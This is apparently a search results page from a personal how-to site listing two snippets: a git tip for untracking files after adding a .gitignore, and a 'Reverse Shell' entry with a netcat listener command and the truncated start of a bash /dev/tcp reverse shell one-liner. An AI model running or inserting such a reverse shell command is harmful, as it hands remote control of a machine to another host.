Advanced Search
Search Results
2 total results found
Reverse Shell
HowTo
shell
How to open a reverse shell On receiving end, open port with i.e. netcat (nc). nc -lvp 4444 On sending server, open connection to receiver with bash -i >& /dev/tcp/<recei...
Remove unwanted files from a git repo AFTER adding a .gitignore.
HowTo
GIT
# See the unwanted files: git ls-files -ci --exclude-standard # Remove the unwanted files: git ls-files -ci --exclude-standard -z | xargs -0 git rm --cached # Commit changes git commit -am "Removed unwanted files marked in .gitignore" # Push git push origin m...